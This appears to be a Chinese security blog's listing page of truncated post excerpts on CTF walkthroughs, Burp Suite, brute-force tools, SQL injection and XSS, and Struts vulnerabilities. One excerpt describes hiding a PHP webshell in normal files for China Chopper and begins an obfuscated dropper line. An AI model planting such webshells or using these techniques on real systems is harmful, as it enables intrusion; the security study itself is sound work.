最近在做网络信息安全攻防学习平台的题目，发现有些题居然需要用到验证码识别，这玩意以前都觉得是高大上的东西，一直没有去研究，这次花了点时间研究了一下，当然只是一些基础的东西，高深的我也不会，分享一下给大...

Burp Suite是一款信息安全从业人员必备的集 成型的渗透测试工具，它采用自动测试和半自动测试的方式，包含了 Proxy,Spider,Scanner,Intruder,Repeater,Sequ...

从今天开始我就准备连载网络信息安全攻防学习平台所有关的过关攻略，对此平台感兴趣的同学们可以来学习一下。 今天连载基础关的12关，基础关相对来说简单点，所以这里直接公开过关思路。 游戏地址： http:...

晚天晚上有辛收到了好朋友Seay(法师)赠送的新书《代码审计：企业级web代码安全架构》，兴奋的一晚上没睡觉(是不是有点过了？^_^)。 这不，立马开启装逼模式，晒新书，晒亲笔签名了喽，感兴趣的兄弟们...

Burp Suite v1.6.09 更新记录 Thursday, November 27, 2014 v1.6.09版修复了v1.6.08版部分用户在32位操作系统上面关于新临时文件的一些问题。 v...

帮朋友打个小广告，欢迎小伙伴们投稿哦。。。 亲爱的白帽子们，为了进一步提升先知社区技术交流的氛围和活跃度，先知技术社区特推出原创文章奖励计划，详细规则如下： 原创文章征集计划： 1、我们关注的原创文章...

首先认识一下小马，一般大马容易暴露，骇客都会留一手，把小马加入正常PHP文件里面 //密码为a,使用中国菜刀连接 隐藏很深的小马 fputs(fopen(chr(46).chr(47).chr(97)...

关于XSS跨站脚本攻击的科普其实已经有人写的相当详细了，但是小弟还是要在这里献丑一下，目的主要是为了配合本站之前发布的SQL注入攻击科普文章，主要是为了我懂小弟学习方便，既然是科普文，那么我写的肯定是...

之前写了一个python ftp暴力破解工具，发到习科上面了，结果好多人说要我写一个mysql和mssql的工具，最近实在忙一直没有时间写，昨天晚上折腾了一个单线程版本的，先发出来给大家玩一下，这个工...

0x01 背景 现在的WEB程序基本都有对SQL注入的全局过滤，像PHP开启了GPC或者在全局文件common.php上使用addslashes()函数对接收的参数进行过滤，尤其是单引号。遇到这种情况...

为了测试WAF，要写一个ASP+MSSQL2005的注入点，自己又不会ASP，于是网上查到了这个文章，文章虽然很老，但是方法却是比较实用的。 首先你要拿了一个webshell，这样你找到连接数据库的文...

apache官方安全公告页面： http://struts.apache.org/development/2.x/docs/security-bulletins.html 其中涉及代码执行的漏洞有：S...